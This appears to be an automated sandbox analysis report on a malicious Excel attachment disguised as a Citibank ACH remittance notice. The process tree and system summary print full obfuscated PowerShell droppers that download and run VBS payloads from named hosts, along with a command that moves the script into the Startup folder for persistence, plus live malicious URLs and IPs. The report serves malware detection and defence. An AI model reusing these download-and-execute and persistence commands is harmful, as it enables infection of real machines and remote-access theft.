Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ACH Remittance Advice_CITI25822.xls

Overview

General Information

Sample Name:ACH Remittance Advice_CITI25822.xls
Analysis ID:690542
MD5:3af8864299165b527737ecb59ec7f47b
SHA1:7199e298af1f0f3273a3e6d9b4186805211c58b5
SHA256:f9b92212d4dbdbddabd88e8e49a5672b5a5bb8fc29243628578fd037de26fcfa
Tags:CitibankRemcosRATxls
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2496 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • wscript.exe (PID: 1212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" MD5: 045451FA238A75305CC26AC982472367)
      • powershell.exe (PID: 1496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • wscript.exe (PID: 1156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01110010,01100101,01101101,01101001,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 1268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • wscript.exe (PID: 2964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" MD5: 045451FA238A75305CC26AC982472367)
      • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • wscript.exe (PID: 512 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • iexplore.exe (PID: 1204 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 1832 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • wscript.exe (PID: 1932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: ACH Remittance Advice_CITI25822.xlsVirustotal: Detection: 13%Perma Link
Antivirus detection for URL or domain
Source: http://209.127.20.13/firm.txtAvira URL Cloud: Label: malware
Source: http://209.127.20.13/remit.jpgAvira URL Cloud: Label: malware
Source: http://209.127.20.13/favicon.icoAvira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbagemen source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 0000000F.00000002.966928962.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdbyp source: powershell.exe, 00000003.00000002.921917508.0000000002776000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /sync/gith.vbs HTTP/1.1Host: kopadd.yunethosting.rsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sync/gith.vbs HTTP/1.1Host: kopadd.yunethosting.rsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /remit.jpg HTTP/1.1Host: 209.127.20.13Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 209.127.20.13 209.127.20.13
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.247.196.66:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: unknownTCP traffic detected without corresponding DNS query: 209.127.20.13
Source: powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: imagestore.dat.8.drString found in binary or memory: http://209.127.20.13/favicon.ico
Source: ~DF946FBCF6F1FE2AEE.TMP.6.dr, {70A1164C-250E-11ED-A620-ECF4BBB5915B}.dat.6.drString found in binary or memory: http://209.127.20.13/firm.txt
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000003.00000002.922353988.0000000002BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000C.00000002.945807312.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.co
Source: powershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943018679.0000000000451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.y
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethos(OE
Source: powershell.exe, 00000003.00000002.926844350.0000000003816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/s
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/sync/gith.vbs
Source: powershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopadd.yunethosting.rs/sync/gith.vbsPEH
Source: powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7FAA8.emfJump to behavior
Source: unknownDNS traffic detected: queries for: kopadd.yunethosting.rs
Source: global trafficHTTP traffic detected: GET /sync/gith.vbs HTTP/1.1Host: kopadd.yunethosting.rsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sync/gith.vbs HTTP/1.1Host: kopadd.yunethosting.rsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /firm.txt HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 209.127.20.13DNT: 1Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 209.127.20.13DNT: 1Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /remit.jpg HTTP/1.1Host: 209.127.20.13Connection: Keep-Alive

System Summary

barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001
